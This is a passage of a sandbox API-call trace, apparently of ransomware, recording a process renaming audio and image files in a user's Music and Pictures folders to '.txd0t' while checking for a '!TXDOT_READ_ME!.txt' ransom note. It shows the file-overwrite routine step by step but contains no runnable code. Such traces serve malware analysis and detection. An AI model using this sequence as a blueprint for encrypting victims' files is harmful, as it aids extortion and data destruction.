lpNewFilePointer=0xffffffff) returned 1 [0075.103] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11f0, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11f0, lpOverlapped=0x0) returned 1 [0075.103] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffee10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.103] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x11f0, lpOverlapped=0x0) returned 1 [0075.103] FlushFileBuffers (hFile=0x468) returned 1 [0075.111] GetProcessHeap () returned 0xe30000 [0075.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0075.111] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" [0075.111] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav") returned="W-oOtVbhE3qMz.wav" [0075.111] StrCpyW (in: psz1=0xe9b6a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.111] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned 1 [0075.111] GetProcessHeap () returned 0xe30000 [0075.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.111] CloseHandle (hObject=0x468) returned 1 [0075.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\w-ootvbhe3qmz.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\w-ootvbhe3qmz.wav.txd0t")) returned 1 [0075.124] SetEvent (hEvent=0x3f8) returned 1 [0075.124] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.127] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" [0075.127] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t" [0075.127] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t") returned 0 [0075.127] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a", dwFileAttributes=0x80) returned 1 [0075.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" (normalized: "c:\\users\\fd1hvy\\music\\vo0c5wvuia8ayl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0075.135] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=52071) returned 1 [0075.135] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.136] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.140] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff3299, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.140] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xcb60, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xcb60, lpOverlapped=0x0) returned 1 [0075.141] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff34a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.141] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xcb60, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xcb60, lpOverlapped=0x0) returned 1 [0075.141] FlushFileBuffers (hFile=0x47c) returned 1 [0075.154] GetProcessHeap () returned 0xe30000 [0075.154] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf6a8 [0075.154] StrCpyW (in: psz1=0xecf6a8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" [0075.154] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a") returned="VO0C5WvUIA8AyL.m4a" [0075.154] StrCpyW (in: psz1=0xecf6dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.154] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned 1 [0075.154] GetProcessHeap () returned 0xe30000 [0075.154] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf6a8 | out: hHeap=0xe30000) returned 1 [0075.154] CloseHandle (hObject=0x47c) returned 1 [0075.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" (normalized: "c:\\users\\fd1hvy\\music\\vo0c5wvuia8ayl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\vo0c5wvuia8ayl.m4a.txd0t")) returned 1 [0075.158] SetEvent (hEvent=0x3f8) returned 1 [0075.158] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.163] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" [0075.163] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t" [0075.163] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t") returned 0 [0075.163] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3", dwFileAttributes=0x80) returned 1 [0075.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\v24acfd5czbx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0075.163] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=52949) returned 1 [0075.164] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.164] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.165] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff2f2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.165] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xced0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0xced0, lpOverlapped=0x0) returned 1 [0075.166] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff3130, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.166] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xced0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0xced0, lpOverlapped=0x0) returned 1 [0075.166] FlushFileBuffers (hFile=0x47c) returned 1 [0075.169] GetProcessHeap () returned 0xe30000 [0075.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x136) returned 0xeca148 [0075.169] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" [0075.169] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3") returned="v24aCFd5CzBX.mp3" [0075.169] StrCpyW (in: psz1=0xeca1b6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.169] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt") returned 1 [0075.172] GetProcessHeap () returned 0xe30000 [0075.172] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.172] CloseHandle (hObject=0x47c) returned 1 [0075.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\v24acfd5czbx.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\v24acfd5czbx.mp3.txd0t")) returned 1 [0075.174] SetEvent (hEvent=0x3f8) returned 1 [0075.174] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.178] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" [0075.179] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t" [0075.179] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t") returned 0 [0075.179] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav", dwFileAttributes=0x80) returned 1 [0075.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\csnuonqz6xed.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0075.179] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=98247) returned 1 [0075.179] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.179] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.191] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe7e39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.191] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x17fc0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x17fc0, lpOverlapped=0x0) returned 1 [0075.193] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe8040, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.193] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x17fc0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x17fc0, lpOverlapped=0x0) returned 1 [0075.194] FlushFileBuffers (hFile=0x47c) returned 1 [0075.431] GetProcessHeap () returned 0xe30000 [0075.431] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xeca148 [0075.431] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" [0075.431] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav") returned="cSnUOnQz6xEd.wav" [0075.431] StrCpyW (in: psz1=0xeca1a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.431] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned 1 [0075.432] GetProcessHeap () returned 0xe30000 [0075.432] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.432] CloseHandle (hObject=0x47c) returned 1 [0075.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\csnuonqz6xed.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\csnuonqz6xed.wav.txd0t")) returned 1 [0075.435] SetEvent (hEvent=0x3f8) returned 1 [0075.435] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.437] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" [0075.437] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t" [0075.438] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t") returned 0 [0075.438] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav", dwFileAttributes=0x80) returned 1 [0075.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\nxidve2fmxuql9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.438] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=65529) returned 1 [0075.438] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.438] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.439] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffefe07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.439] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xfff0, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0xfff0, lpOverlapped=0x0) returned 1 [0075.441] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff0010, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.441] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xfff0, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0xfff0, lpOverlapped=0x0) returned 1 [0075.441] FlushFileBuffers (hFile=0x460) returned 1 [0075.789] GetProcessHeap () returned 0xe30000 [0075.790] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x126) returned 0xec8310 [0075.790] StrCpyW (in: psz1=0xec8310, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" [0075.790] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav") returned="NXIDve2FMxUql9.wav" [0075.790] StrCpyW (in: psz1=0xec836a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.790] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned 1 [0075.790] GetProcessHeap () returned 0xe30000 [0075.790] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8310 | out: hHeap=0xe30000) returned 1 [0075.790] CloseHandle (hObject=0x460) returned 1 [0075.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\nxidve2fmxuql9.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\nxidve2fmxuql9.wav.txd0t")) returned 1 [0075.793] SetEvent (hEvent=0x3f8) returned 1 [0075.794] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.794] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" [0075.794] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t" [0075.794] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t") returned 0 [0075.794] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif", dwFileAttributes=0x80) returned 1 [0075.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7ln6g64dp6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.795] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=72810) returned 1 [0075.795] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.795] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.795] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee196, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.795] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11c60, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x11c60, lpOverlapped=0x0) returned 1 [0075.796] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee3a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.796] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11c60, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x11c60, lpOverlapped=0x0) returned 1 [0075.797] FlushFileBuffers (hFile=0x460) returned 1 [0075.820] GetProcessHeap () returned 0xe30000 [0075.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf078 [0075.820] StrCpyW (in: psz1=0xecf078, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" [0075.820] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif") returned="7ln6G64dp6.gif" [0075.820] StrCpyW (in: psz1=0xecf0b2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.820] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0075.823] GetProcessHeap () returned 0xe30000 [0075.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf078 | out: hHeap=0xe30000) returned 1 [0075.823] CloseHandle (hObject=0x460) returned 1 [0075.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7ln6g64dp6.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\7ln6g64dp6.gif.txd0t")) returned 1 [0075.826] SetEvent (hEvent=0x3f8) returned 1 [0075.826] WaitForSingleObject (hHandle=0x3fc, 